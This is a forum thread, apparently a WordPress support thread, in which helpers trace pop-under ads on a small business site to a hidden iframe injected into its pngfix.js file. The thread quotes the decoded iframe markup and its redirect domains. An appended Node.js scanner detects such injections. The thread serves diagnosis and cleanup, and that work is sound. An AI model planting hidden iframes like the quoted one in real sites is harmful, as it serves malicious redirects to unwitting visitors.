It’s not WP. Are you using an external statistics service? Maybe something like onestat? Some of them are shady.
Could also be a plugin or your theme. I’ll take a look at your URL real quick…
Weird. I don’t see any JavaScript in your blog. However, your main site does have some scripts from http://analystic.in. Might want to see if they’re the source.
Hi, thanks for your reply. I have searched the source code of our htm documents for any reference to http://analystic.in but there is no mention of them, and no code that would force a popup ad.
How is this happening??
If there is nothing in my code to trigger a popup ad, how are the ads appearing?
I really appreciate any advice anyone can give. And it seems that the popups are happening with every page in the site EXCEPT the blog itself. Yet the blog is the only part of the site that is ‘new’.
Cheers,
Steve
Actually I’m getting the popups on the main site, not the blog. They’re coming from google-analistyk.com and a quick google search shows your other thread. (Do note that you’re using the wordpress software. wordpress.com is actually a host that also uses the software.)
I’m looking….
Yes, my partner is also trying to find a solution.
I certainly appreciate your help. These pop-under ads are probably why our web traffic has dropped by almost 30% over the last few days, since adding the blog, and we are understandably keen to get rid of them.
Cheers,
Steve
Found it and Adam was right.
The analystic.in call is within your http://cairnsunlimited.com/pngfix.js file. That’s the document.write bit at the end.
It translates to the following:
<iframe src="http://analystic.cn/in.cgi?default" style="visibility: hidden; display: none"></iframe>
Take that URL within that iframe and paste it into a browser url bar. You’ll see it get redirected to google-analistyk.com and then another site which gets blocked from here so I can’t tell you what it is.
edit: Discussed here
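An added example, not part of the original thread or of the site's code: a small Node.js check that statically decodes the string arguments of `document.write()` calls in a script and reports any that emit a hidden iframe. It assumes the injected markup is percent-encoded and wrapped in `unescape()`, which the thread does not state; the sample script and the `tracker.example.invalid` host are constructed.

```javascript
// Assumption: the injected markup is percent-encoded (unescape-style).
// Nothing is executed; strings are only decoded and pattern-matched.

function decodeLayer(text) {
  // Undo %XX and %uXXXX escapes; anything else is left untouched.
  return text.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

function findHiddenIframeWrites(source) {
  const findings = [];
  // Each document.write()/writeln() call, up to the ')' that ends the statement.
  const callRe = /document\.write(?:ln)?\s*\(([\s\S]*?)\)\s*(?:;|$)/gm;
  const literalRe = /(["'])((?:\\.|(?!\1)[^\\])*)\1/g;
  const hiddenRe = /display\s*:\s*none|visibility\s*:\s*hidden|(?:width|height)\s*=\s*["']?[01]\b/i;

  for (const call of source.matchAll(callRe)) {
    // Join all string literals so 'a' + 'b' splitting does not hide the markup.
    let markup = [...call[1].matchAll(literalRe)].map(m => m[2]).join('');
    // Peel nested encoding layers, with a small bound.
    for (let i = 0; i < 3; i++) {
      const next = decodeLayer(markup);
      if (next === markup) break;
      markup = next;
    }
    const tag = markup.match(/<iframe\b[^>]*>/i);
    if (!tag || !hiddenRe.test(tag[0])) continue;
    const src = tag[0].match(/src\s*=\s*["']?([^"'\s>]+)/i);
    findings.push({
      line: source.slice(0, call.index).split('\n').length,
      src: src ? src[1] : null,
      markup: tag[0],
    });
  }
  return findings;
}

// Constructed sample: a helper script with one benign write and one appended injection.
const SAMPLE = [
  "function fixPng(img) { img.style.filter = ''; }",
  "document.write('<p>legitimate banner</p>');",
  "document.write(unescape('%3Ciframe%20src%3D%22http%3A//tracker.example.invalid/in.cgi%3Fdefault%22%20style%3D%22visibility%3A%20hidden%3B%20display%3A%20none%22%3E%3C/iframe%3E'));",
].join('\n');

console.log(findHiddenIframeWrites(SAMPLE));
```

Run it over every `.js` file the site serves and compare any hit against a known-good copy of the file, since a script that no page source mentions by domain can still pull one in at load time.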
Wow, you guys are guns!!! How you found that so quickly is beyond me. I was on the phone to my webhost when I read your reply, so the offending piece of code has been removed, and I have changed my cpanel password. I am still confused as to HOW the malicious piece of code was added to our javascript file in the first place, but am greatly relieved that you found the solution, and equally relieved that WP was not responsible.
In case anyone is interested, the company behind the malicious piece of code was cpx interactive
Shame Shame Shame
Not a problem. By the way, there’s a newer version of the pngfix.js file available at the URL in that file. Not sure if it works any better but I just wanted to let you know.
P.S. I use the Web Developer add-on for Firefox. I just hit “Information -> View Javascript” to see that the script was there. Kudos to theapparatus for finding the exact place that was calling it, though.